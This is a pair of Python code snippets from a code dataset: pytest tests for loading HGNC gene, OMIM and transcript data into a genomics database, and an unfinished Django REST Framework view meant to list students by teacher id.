exac_lines=exac_handle,
mim2gene_lines=mim2gene_handle,
genemap_lines=genemap_handle,
hpo_lines=hpo_genes_handle,
build='37'
)
nr_genes = 0
for gene_info in gene_objects:
if gene_info.get('chromosome'):
nr_genes += 1
# THEN assert all genes have been added to the database
assert sum(1 for i in adapter.all_genes()) == nr_genes
# THEN assert that the last gene was loaded
assert adapter.hgnc_gene(gene_info['hgnc_id'])
def test_load_hgnc_genes_no_omim(adapter, genes37_handle, hgnc_handle, exac_handle,
hpo_genes_handle):
# GIVEN a empty database
assert sum(1 for i in adapter.all_genes()) == 0
# WHEN inserting a number of genes
gene_objects = load_hgnc_genes(adapter,
ensembl_lines=genes37_handle,
hgnc_lines=hgnc_handle,
exac_lines=exac_handle,
hpo_lines=hpo_genes_handle,
build='37'
)
nr_genes = 0
for gene_info in gene_objects:
if gene_info.get('chromosome'):
nr_genes += 1
# THEN assert all genes have been added to the database
assert sum(1 for i in adapter.all_genes()) == nr_genes
# THEN assert that the last gene was loaded
assert adapter.hgnc_gene(gene_info['hgnc_id'])
def test_load_hgnc(adapter, genes37_handle, hgnc_handle, exac_handle,
mim2gene_handle, genemap_handle, hpo_genes_handle, transcripts_handle):
# GIVEN a empty database
assert sum(1 for i in adapter.all_genes()) == 0
# WHEN inserting a number of genes
load_hgnc(adapter,
ensembl_lines=genes37_handle,
hgnc_lines=hgnc_handle,
exac_lines=exac_handle,
mim2gene_lines=mim2gene_handle,
genemap_lines=genemap_handle,
hpo_lines=hpo_genes_handle,
transcripts_lines=transcripts_handle,
build='37'
)
# THEN assert all genes have been added to the database
assert sum(1 for i in adapter.all_genes()) > 0
# THEN assert at least one transcript is loaded
assert adapter.transcript_collection.find_one()
def test_load_hgnc_no_omim(adapter, genes37_handle, hgnc_handle, exac_handle,
hpo_genes_handle, transcripts_handle):
# GIVEN a empty database
assert sum(1 for i in adapter.all_genes()) == 0
# WHEN inserting a number of genes without omim information
load_hgnc(adapter,
ensembl_lines=genes37_handle,
hgnc_lines=hgnc_handle,
exac_lines=exac_handle,
hpo_lines=hpo_genes_handle,
transcripts_lines=transcripts_handle,
build='37'
)
# THEN assert all genes have been added to the database
assert sum(1 for i in adapter.all_genes()) > 0
# THEN assert at least one transcript is loaded
assert adapter.transcript_collection.find_one()
| StarcoderdataPython |
1696898 | from django.http import JsonResponse
from rest_framework.response import Response
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
RetrieveAPIView,
UpdateAPIView,
DestroyAPIView
)
from rest_framework.permissions import (
AllowAny,
IsAuthenticated,
IsAdminUser,
IsAuthenticatedOrReadOnly
)
from rest_framework.views import APIView
from ..models import Student, Course
from ..auth.serializers import StudentSerializer, UserSerializer
from ..course.serializers import CourseDetailSerializer
from rest_framework_jwt.authentication import JSONWebTokenAuthentication
from ..permissions import IsTeacher, IsStudent
class GetStudentsByTeacherIdListAPIView(APIView):
permission_classes = (IsAuthenticated, IsTeacher)
authentication_classes = (JSONWebTokenAuthentication,)
def get(self, format=None):
teacher_id = self.request.GET['teacher_id']
course_ids = Course.Objects.filter(teacher_id=teacher_id).values_list('teacher_id',flat=true)
print(course_ids)
#course_id = self.request.GET['course_id']
#students = Student.objects.filter(course=course_id)
#serializer = StudentSerializer(students, many=True)
return Response({"Hello"})
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.